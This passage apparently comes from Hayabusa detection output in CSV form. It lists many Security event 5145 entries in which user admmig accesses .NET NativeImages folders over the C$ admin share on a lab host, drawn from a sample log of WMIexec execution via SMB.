+2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
